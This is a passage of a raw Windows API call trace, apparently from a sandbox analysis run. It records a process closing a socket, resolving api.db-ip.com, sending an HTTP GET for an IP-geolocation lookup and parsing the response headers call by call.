GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] ResetEvent (hEvent=0x3f4) returned 1 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] ResetEvent (hEvent=0x3f4) returned 1 [0103.182] GetLocalTime (in: lpSystemTime=0x19fc78 | out: lpSystemTime=0x19fc78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x264)) [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] SetEvent (hEvent=0x3f0) returned 1 [0103.182] SetEvent (hEvent=0x3f4) returned 1 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] ResetEvent (hEvent=0x3f4) returned 1 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] ResetEvent (hEvent=0x3f4) returned 1 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] SetEvent (hEvent=0x3f0) returned 1 [0103.182] SetEvent (hEvent=0x3f4) returned 1 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] ResetEvent (hEvent=0x3f4) returned 1 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.182] GetCurrentThreadId () returned 0x1358 [0103.183] ResetEvent (hEvent=0x3f4) returned 1 [0103.183] CloseHandle (hObject=0x3f4) returned 1 [0103.183] CloseHandle (hObject=0x3f0) returned 1 [0103.183] GetCurrentThreadId () returned 0x1358 [0103.183] GetCurrentThreadId () returned 0x1358 [0103.183] GetCurrentThreadId () returned 0x1358 [0103.183] GetCurrentThreadId () returned 0x1358 [0103.183] GetCurrentThreadId () returned 0x1358 [0103.183] GetCurrentThreadId () returned 0x1358 [0103.183] shutdown (s=0x3d0, how=1) returned 0 [0103.183] closesocket (s=0x3d0) returned 0 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] GetCurrentThreadId () returned 0x1358 [0103.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.185] GetCurrentThreadId () returned 0x1358 [0103.185] GetCurrentThreadId () returned 0x1358 [0103.185] GetCurrentThreadId () returned 0x1358 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/v2/free/95.222.165.118/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0103.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.db-ip.com", cchCount2=13) returned 1 [0103.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0103.186] socket (af=2, type=1, protocol=0) returned 0x3d0 [0103.186] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0103.186] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0103.186] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0103.187] htons (hostshort=0x0) returned 0x0 [0103.187] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0103.187] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc21f, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0103.187] htons (hostshort=0x1fc2) returned 0xc21f [0103.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.db-ip.com", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0103.187] GetAddrInfoW (in: pNodeName="api.db-ip.com", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1ea88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) returned 0 [0103.188] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1ea88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) [0103.188] htons (hostshort=0x50) returned 0x5000 [0103.188] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=16) returned 0 [0103.251] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc21f, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0103.252] htons (hostshort=0x1fc2) returned 0xc21f [0103.252] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=0x19fb28) returned 0 [0103.252] htons (hostshort=0x5000) returned 0x50 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0103.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] GetCurrentThreadId () returned 0x1358 [0103.252] send (s=0x3d0, buf=0x24730e8*, len=196, flags=0) returned 196 [0103.253] GetTickCount64 () returned 0x115b1b8 [0103.253] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0103.286] recv (in: s=0x3d0, buf=0x242e938, len=32768, flags=0 | out: buf=0x242e938*) returned 524 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] GetTickCount64 () returned 0x115b1d8 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Cache-control", cchCount2=13) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 2 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Language", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 3 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 1 [0103.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0103.289] GetCurrentThreadId () returned 0x1358 [0103.289] GetCurrentThreadId () returned 0x1358 [0103.289] GetCurrentThreadId () returned 0x1358 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Length", cchCount2=14) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Length", cchCount2=14) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 1 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0103.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0103.289] CompareStringW (Locale=0x400, 